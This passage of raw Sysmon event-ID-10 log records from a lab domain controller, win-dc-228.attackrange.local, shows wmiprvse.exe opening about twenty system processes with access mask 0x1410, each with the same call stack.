14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5B00-00000000AD01}3492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204393Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8444-603E-5800-00000000AD01}3304C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204392Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3400-00000000AD01}2960C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204391Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8440-603E-3300-00000000AD01}2668C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204390Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3100-00000000AD01}2400C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204389Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204388Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2F00-00000000AD01}2420C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204387Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204386Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2D00-00000000AD01}2308C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204385Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204384Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2B00-00000000AD01}2540C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204383Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204382Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2700-00000000AD01}3004C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204381Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8439-603E-2500-00000000AD01}2856C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204380Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8430-603E-1800-00000000AD01}1928C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204379Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1700-00000000AD01}1452C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204378Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204377Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204376Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1400-00000000AD01}1096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204375Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1300-00000000AD01}896C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204374Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 